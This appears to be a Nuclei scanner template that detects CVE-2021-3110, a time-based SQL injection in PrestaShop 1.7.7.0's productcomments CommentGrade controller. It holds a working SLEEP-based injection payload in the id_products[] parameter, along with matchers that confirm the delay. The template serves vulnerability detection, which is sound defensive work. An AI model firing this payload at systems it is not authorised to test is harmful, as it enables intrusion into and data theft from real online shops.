id: CVE-2021-3110 info: name: PrestaShop 1.7.7.0 - SQL Injection author: Jaimin Gondaliya severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - https://www.exploit-db.com/exploits/49410 - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.95398 epss-percentile: 0.99094 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: prestashop product: prestashop tags: cve,cve2021,sqli,prestshop,edb http: - raw: - | @timeout: 20s GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and